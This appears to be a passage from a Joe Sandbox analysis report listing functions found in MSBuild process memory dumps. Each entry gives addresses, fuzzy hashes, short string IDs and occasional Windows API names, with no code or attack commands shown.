                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \Lg
                                                                                                            • API String ID: 0-2236610822
                                                                                                            • Opcode ID: e03b6d7715681d18845a07e90f63fa57d60f754ac91b34826dea11f160b21367
                                                                                                            • Instruction ID: f2ce9e33b24b6e9484f0c9608c3fcc23af2b5860400e017e9ca722c2104113ed
                                                                                                            • Opcode Fuzzy Hash: e03b6d7715681d18845a07e90f63fa57d60f754ac91b34826dea11f160b21367
                                                                                                            • Instruction Fuzzy Hash: 3B22AF74E01219CFDB55CFA9C980ADDBBF6BF49304F1481AAD809AB355E730AA85CF50
                                                                                                            Function 022BC862 Relevance: 1.7, Strings: 1, Instructions: 412COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: \Lg
                                                                                                            • API String ID: 0-2236610822
                                                                                                            • Opcode ID: d9a0f4c4e6b68ad2da1741a99ad078a5ed3dfde02dcc212136d841f121419270
                                                                                                            • Instruction ID: 9171b3a029d0344bd06f69d28ae65c34bb128114269179010cd5302666ddfa7c
                                                                                                            • Opcode Fuzzy Hash: d9a0f4c4e6b68ad2da1741a99ad078a5ed3dfde02dcc212136d841f121419270
                                                                                                            • Instruction Fuzzy Hash: C4229F74E01219CFDB54CFA9C980A9DBBF2BF49304F1581AAD919AB355E730AA85CF40
                                                                                                            Function 022B1060 Relevance: 1.5, Strings: 1, Instructions: 292COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 5xID
                                                                                                            • API String ID: 0-3965296546
                                                                                                            • Opcode ID: c67465ecb0e6c836190afe129b795d3d4644bcf5b2a4b9b16ca3660624671c33
                                                                                                            • Instruction ID: d6e7774e9da78d6de3eae6b1989edaeff20f7ae874a6b842ae2df61f24672848
                                                                                                            • Opcode Fuzzy Hash: c67465ecb0e6c836190afe129b795d3d4644bcf5b2a4b9b16ca3660624671c33
                                                                                                            • Instruction Fuzzy Hash: 86E1C474E002198FDB54DFA9C590A9EBBF1FF48304F1481AAD509EB359EB34AA45CF50
                                                                                                            Function 07412B91 Relevance: 1.5, Strings: 1, Instructions: 258COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2535967631.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_7410000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: d:p
                                                                                                            • API String ID: 0-2286290242
                                                                                                            • Opcode ID: 74739d64611beaca38bcdb78856be88bb9cc211abcca74067b2dba2d9ab11b5d
                                                                                                            • Instruction ID: 41e93f36d626735bed79d884479229e80bd0a1f8517c31e38af8a90de30bc16c
                                                                                                            • Opcode Fuzzy Hash: 74739d64611beaca38bcdb78856be88bb9cc211abcca74067b2dba2d9ab11b5d
                                                                                                            • Instruction Fuzzy Hash: FBC19EB4E006298FDB64DF69C9847DEBBB2BB49310F1481A6E959E7354D7309A81CF40
                                                                                                            Function 022BB01F Relevance: 1.5, Strings: 1, Instructions: 215COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: rCI
                                                                                                            • API String ID: 0-4128173682
                                                                                                            • Opcode ID: 11d44c823fac589b84d9613ff174fbfb59229db47b95f546a263d1de88bf1154
                                                                                                            • Instruction ID: 7245a1fb402acd43a848a6e5f340d8d92b4fea56be4854c0c47f1a483c308f1f
                                                                                                            • Opcode Fuzzy Hash: 11d44c823fac589b84d9613ff174fbfb59229db47b95f546a263d1de88bf1154
                                                                                                            • Instruction Fuzzy Hash: 4A915874E106199FDB25CFA8D880BDDBBF5AF89344F1481A6E809EB319DB709A41CF40
                                                                                                            Function 0669C708 Relevance: 1.3, Strings: 1, Instructions: 40COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: <
                                                                                                            • API String ID: 0-4251816714
                                                                                                            • Opcode ID: 6f9edc598dfaffd5c6344e5838768746bd568fae618e7db3df376c816ddb3d4b
                                                                                                            • Instruction ID: b8b5be9900abb7736109269486758071b2aed0b13ec3fbed448c9da774ef37c2
                                                                                                            • Opcode Fuzzy Hash: 6f9edc598dfaffd5c6344e5838768746bd568fae618e7db3df376c816ddb3d4b
                                                                                                            • Instruction Fuzzy Hash: 48F0CD70D46308AFCB41CFA8E8405ECBF79EF46221F0401AAE804A3362C3354E61CB61
                                                                                                            Function 0742A2C8 Relevance: .9, Instructions: 877COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2536027970.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_7420000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 989e5a2184b87b91dd9b1f0d2804db4b000b8df6d3ab6b9aa1be85b0c30dd12f
                                                                                                            • Instruction ID: b6054dd19226753f7364f9964ed286a16116d0335fce0154baf17e73752f3ef2
                                                                                                            • Opcode Fuzzy Hash: 989e5a2184b87b91dd9b1f0d2804db4b000b8df6d3ab6b9aa1be85b0c30dd12f
                                                                                                            • Instruction Fuzzy Hash: FDA26EB4A016298FDB60DF68C984BDDBBB1BF49304F5481EAD809A7355DB30AE81CF54
                                                                                                            Function 06692830 Relevance: .9, Instructions: 859COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cc5d26797a3bcc1d0ba55d1959484c507c2c5a7869bd34152f3648b88ebf2990
                                                                                                            • Instruction ID: 3c2febc84d306f056da968586427a45b888de9965c2b300b7a37a6fc38849937
                                                                                                            • Opcode Fuzzy Hash: cc5d26797a3bcc1d0ba55d1959484c507c2c5a7869bd34152f3648b88ebf2990
                                                                                                            • Instruction Fuzzy Hash: 82A23874E012298FDBA4DF69C994B9DBBF5BB49300F1081EAD80DA7355DB30AE818F54
                                                                                                            Function 06690040 Relevance: .5, Instructions: 507COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f25a4e9d6b7fdd6024e8a4ba84cf6aa005d35b751f15f0320df17b3ecbe3172f
                                                                                                            • Instruction ID: f38e4aee2708dfcf40a590db9ac183e014b1929e2104d0590559824aec80257b
                                                                                                            • Opcode Fuzzy Hash: f25a4e9d6b7fdd6024e8a4ba84cf6aa005d35b751f15f0320df17b3ecbe3172f
                                                                                                            • Instruction Fuzzy Hash: 1C32D674E002288FDB64DF69C981BDDBBB6BF89300F1482A9D509A7395DB349E81CF54
                                                                                                            Function 0742EB01 Relevance: .4, Instructions: 425COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2536027970.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_7420000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 48aa4e5c5ea5001782098b8423c449d0a2d135d807b5c31dac878cb03cba8fd7
                                                                                                            • Instruction ID: 794fa82acb01f6b3f9749ba31261a62571ae077ec4e391efba39862b3cbb7994
                                                                                                            • Opcode Fuzzy Hash: 48aa4e5c5ea5001782098b8423c449d0a2d135d807b5c31dac878cb03cba8fd7
                                                                                                            • Instruction Fuzzy Hash: E912C2B4E01229CFDB64DF69C944BDEBBB2BF89300F5481AAD409A7254DB309E85CF54
                                                                                                            Function 0669F2B0 Relevance: .4, Instructions: 399COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 8861da7eec4b6e1d7a365e7018ec93ec7feb138fe96b58f86e74ecaea1e6cccd
                                                                                                            • Instruction ID: 285f1ed70333a86ae81896608ab48fe86ef837162d289dc6076a4449832d8b4d
                                                                                                            • Opcode Fuzzy Hash: 8861da7eec4b6e1d7a365e7018ec93ec7feb138fe96b58f86e74ecaea1e6cccd
                                                                                                            • Instruction Fuzzy Hash: 33F14735A00619DFCF55CF68C5849AEBBF6FF48700B568429E906EB251EB34E981CF90
                                                                                                            Function 06695C09 Relevance: .4, Instructions: 365COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: c6516e4bc03f4843f8173be290daf31099b31f3273e2f5e62bf85794075adc19
                                                                                                            • Instruction ID: e239f42ecb51bb6e2049adbdc7471682e968414a99bf09d184977c8b75b6649c
                                                                                                            • Opcode Fuzzy Hash: c6516e4bc03f4843f8173be290daf31099b31f3273e2f5e62bf85794075adc19
                                                                                                            • Instruction Fuzzy Hash: 4702E774E006188FEB64DF69C984B9DBBF6BF88300F1481A9E419AB355DB34AD81CF54
                                                                                                            Function 0669B640 Relevance: .3, Instructions: 292COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a341a83c4aa2bf0e00d26f5009517afef6c01fdd6e84c7c0e926246e08fe4b88
                                                                                                            • Instruction ID: 8082ff28abdb2eaa48c77e86e288d5f90f4697cfbf347d98104970c47a6fe3c6
                                                                                                            • Opcode Fuzzy Hash: a341a83c4aa2bf0e00d26f5009517afef6c01fdd6e84c7c0e926246e08fe4b88
                                                                                                            • Instruction Fuzzy Hash: 47D1CF74E00219CFDB54CFA9D984B9EBBF6BB49300F1481A9E809EB355D734A981CF60
                                                                                                            Function 066963A8 Relevance: .3, Instructions: 276COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 35664b81f388c60aa555b93e4087f19722baf27b4e27a20d0dea9a5b1b06cca5
                                                                                                            • Instruction ID: 744ff0045437e3d80c7da149851bba7de400965deb2753de4171c153bc4d3b7a
                                                                                                            • Opcode Fuzzy Hash: 35664b81f388c60aa555b93e4087f19722baf27b4e27a20d0dea9a5b1b06cca5
                                                                                                            • Instruction Fuzzy Hash: 47C1F774A012198FEB64DF68C981B9EB7B6FF88300F1481A5E419EB355DB34AE81CF54
                                                                                                            Function 066963A6 Relevance: .3, Instructions: 276COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 953f53c87121c520f7308e539312dc661cbffd4825cd7f4d2a03e772dd2110cb
                                                                                                            • Instruction ID: 6a101d89fb7f2569895c8be16d84589de065b7e7a164db352548af22a2c8918e
                                                                                                            • Opcode Fuzzy Hash: 953f53c87121c520f7308e539312dc661cbffd4825cd7f4d2a03e772dd2110cb
                                                                                                            • Instruction Fuzzy Hash: 63C1E574A012198FEB54DF68C981B9DBBB6FF88300F1481A5E419EB355DB34AE81CF54
                                                                                                            Function 066963B1 Relevance: .3, Instructions: 276COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: f27c1828d66d2aa44d71796c050dfc4c9d1b26c65bdac593b606591e81b85b2b
                                                                                                            • Instruction ID: 517c3caf75db075955e79452cff1d40f80f164201a22cd75e616ae828cc64134
                                                                                                            • Opcode Fuzzy Hash: f27c1828d66d2aa44d71796c050dfc4c9d1b26c65bdac593b606591e81b85b2b
                                                                                                            • Instruction Fuzzy Hash: 77C1F674A012198FEB64DF68C981B9DBBB6FF88300F1481A5E419EB355DB34AE81CF54
                                                                                                            Function 0669C5C8 Relevance: .1, Instructions: 94COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d5a62e55b4d23bec4debdedd7f2d9aedd58e7405108266c183dbf563bb742c4d
                                                                                                            • Instruction ID: 7542c2c4fe52359f05d93dd05cb4fd2b7f22935d4b33be5e92af8519da15191b
                                                                                                            • Opcode Fuzzy Hash: d5a62e55b4d23bec4debdedd7f2d9aedd58e7405108266c183dbf563bb742c4d
                                                                                                            • Instruction Fuzzy Hash: 42310474E002189FCB44EFA9D894AEDBBF5BF49310F149129E815B7395DB30AD42CBA4
                                                                                                            Function 0669C5D8 Relevance: .1, Instructions: 89COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: dab51e6c4a167833246bf6f851d6791912621d9e2c999a47e96bbc50ea8e6959
                                                                                                            • Instruction ID: a504533400bc7a54b35c11a7e5d0172f9bf40c8c8fc97bb13a574afbe62f4f08
                                                                                                            • Opcode Fuzzy Hash: dab51e6c4a167833246bf6f851d6791912621d9e2c999a47e96bbc50ea8e6959
                                                                                                            • Instruction Fuzzy Hash: E331D374E002189FCB44EFA9D894AEDBBF5FF49310F149129E415B7395DB30A842CB64
                                                                                                            Function 06696CB9 Relevance: 2.7, Strings: 2, Instructions: 207COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Wf$e
                                                                                                            • API String ID: 0-4159974372
                                                                                                            • Opcode ID: 863fa90f1cb44e137891d5e1ac448f072a1c20f53595d0342a05d4aa9dbde9ff
                                                                                                            • Instruction ID: bd4f451bf9e90e7c1be9bf48730545f80ac1bb6af531cd0c691b40e02cdf7cc0
                                                                                                            • Opcode Fuzzy Hash: 863fa90f1cb44e137891d5e1ac448f072a1c20f53595d0342a05d4aa9dbde9ff
                                                                                                            • Instruction Fuzzy Hash: 95A1C374E006188FDB54DFA9C884ADEBBB6BF49300F1481A5E818EB354DB34AA85CF54
                                                                                                            Function 0669BA9D Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Q$Teq
                                                                                                            • API String ID: 0-937884286
                                                                                                            • Opcode ID: 05c82f1e4dc2b099361e840feda675632d452cd34bb30e87fbda98c3951a4871
                                                                                                            • Instruction ID: 7b0075b053d6b7a87fd617826d47da9627d415cb768105ef511e8c82d19a7cf9
                                                                                                            • Opcode Fuzzy Hash: 05c82f1e4dc2b099361e840feda675632d452cd34bb30e87fbda98c3951a4871
                                                                                                            • Instruction Fuzzy Hash: 9471D774E012189FDB54DFA9D984A9DFBF2BF89300F14816AE809AB365DB30AD41CF50
                                                                                                            Function 0669BAC0 Relevance: 2.7, Strings: 2, Instructions: 157COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: Q$Teq
                                                                                                            • API String ID: 0-937884286
                                                                                                            • Opcode ID: 4f026c6e89074c80462b7cbdd77fc19aa7c3f1dc18e7242eba18f1c123ac0b63
                                                                                                            • Instruction ID: e578b043de0019b093fc8c69420a36ba52752d8b5474e6c5adc28d26c8cb5a1e
                                                                                                            • Opcode Fuzzy Hash: 4f026c6e89074c80462b7cbdd77fc19aa7c3f1dc18e7242eba18f1c123ac0b63
                                                                                                            • Instruction Fuzzy Hash: E4618374E002189FDB54DFA9D984A9DBBF2BF89300F249169E819BB365DB30AD41CF50
                                                                                                            Function 07419233 Relevance: 1.7, Strings: 1, Instructions: 425COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2535967631.0000000007410000.00000040.00000800.00020000.00000000.sdmp, Offset: 07410000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_7410000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: *
                                                                                                            • API String ID: 0-163128923
                                                                                                            • Opcode ID: a88fa88c12bfd3422eebe1f293c769df1274761243d64142966b61faff840961
                                                                                                            • Instruction ID: aa55027ac5d6dc3f7e39b230347c81019a906a288f857b0bf750629cd5934dbd
                                                                                                            • Opcode Fuzzy Hash: a88fa88c12bfd3422eebe1f293c769df1274761243d64142966b61faff840961
                                                                                                            • Instruction Fuzzy Hash: 6A22B474A012288FCB65DF68DD94A9DB7B6FF49301F1481EAE409AB354DB31AE85CF40
                                                                                                            Function 072C09BD Relevance: 1.6, APIs: 1, Instructions: 120COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 072C0ADA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2535711769.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_72c0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: c554a660aa9387dc75b52a7cb2b426662c6605618c1e7c87d6e5edff28f8824e
                                                                                                            • Instruction ID: b801c9710652afe0a3466db2e1b32cd8e15dca36d79327cb02c00915b7fab289
                                                                                                            • Opcode Fuzzy Hash: c554a660aa9387dc75b52a7cb2b426662c6605618c1e7c87d6e5edff28f8824e
                                                                                                            • Instruction Fuzzy Hash: 8651A0B1D10309EFDB24CF9AD884ADEBBB5FF48310F64822AE419AB210D7759945CF91
                                                                                                            Function 072C09C8 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 072C0ADA
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2535711769.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_72c0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 716092398-0
                                                                                                            • Opcode ID: 17685529b60bc384ac51cd4ee3b9e4fc5f277f1e3645089dfa9d0566d16c59e2
                                                                                                            • Instruction ID: 593c028cd1323f37fcd3b996cbac378f9e6a7db301075e27ae44eedc7ca328e2
                                                                                                            • Opcode Fuzzy Hash: 17685529b60bc384ac51cd4ee3b9e4fc5f277f1e3645089dfa9d0566d16c59e2
                                                                                                            • Instruction Fuzzy Hash: B441AEB1D10309DFDB24CF9AD884ADEBBB5BF48310F64822EE819AB210D7759945CF90
                                                                                                            Function 072C12E4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 072C71B1
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2535711769.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_72c0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CallProcWindow
                                                                                                            • String ID:
                                                                                                            • API String ID: 2714655100-0
                                                                                                            • Opcode ID: fa482a7e790a21bcf16097ad53ef95cb09dccb33f02a23fb57032e7dc4412dad
                                                                                                            • Instruction ID: 0934ccb8d7f16b3b33a60551d5d229edaa510f1a609a6190a11832185c7da996
                                                                                                            • Opcode Fuzzy Hash: fa482a7e790a21bcf16097ad53ef95cb09dccb33f02a23fb57032e7dc4412dad
                                                                                                            • Instruction Fuzzy Hash: D14138B491030A9FDB14CF99C888BAABBF5FF88314F24855DD419A7321C775A841CFA0
                                                                                                            Function 0669C819 Relevance: 1.3, Strings: 1, Instructions: 92COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 8
                                                                                                            • API String ID: 0-4194326291
                                                                                                            • Opcode ID: 0062e1ec6fbe491c204574768cff6276a35a6ff9b96f2521b9137a10ac9657a5
                                                                                                            • Instruction ID: baedee56d39292a07913a93f22186d98318044dd05bab90badabdd7a81d9392b
                                                                                                            • Opcode Fuzzy Hash: 0062e1ec6fbe491c204574768cff6276a35a6ff9b96f2521b9137a10ac9657a5
                                                                                                            • Instruction Fuzzy Hash: 54314A70E01209AFCB44DFA8E844AEDFBB6FF89300F149269E815B7350DB306945CB90
                                                                                                            Function 0669C828 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: 8
                                                                                                            • API String ID: 0-4194326291
                                                                                                            • Opcode ID: 97da8e0702ee8498b4dbdad5fb6e9843431697ef62ac85dfd429d28d612451ec
                                                                                                            • Instruction ID: 7de3c3017f4c21c4fb85a2f8562e99afdbf3752b5f820550b92b620da90b17d1
                                                                                                            • Opcode Fuzzy Hash: 97da8e0702ee8498b4dbdad5fb6e9843431697ef62ac85dfd429d28d612451ec
                                                                                                            • Instruction Fuzzy Hash: 2E211570E01219AFCB44DFA9E980ADDBBB6FF89310F149269E405B7354DB30AC45CBA4
                                                                                                            Function 022BF039 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2525217580.00000000022B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_22b0000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: ^
                                                                                                            • API String ID: 0-1590793086
                                                                                                            • Opcode ID: e60e3e56eb4785ac582e83b05ac37574ebdb35305f22caeaa5e718bc7c5be024
                                                                                                            • Instruction ID: ad7ce888001f65347d6ca788e02e05f84d714c45a896d1ee046519382568ef85
                                                                                                            • Opcode Fuzzy Hash: e60e3e56eb4785ac582e83b05ac37574ebdb35305f22caeaa5e718bc7c5be024
                                                                                                            • Instruction Fuzzy Hash: 9721F070C192889FCF029FB4AD583EDBBB0EF57350F0096AAC501565A6DB79050ACB51
                                                                                                            Function 06695B4A Relevance: 1.3, Strings: 1, Instructions: 62COMMON
                                                                                                            Download Yara Rule
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000E.00000002.2534373193.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_14_2_6690000_MSBuild.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: u
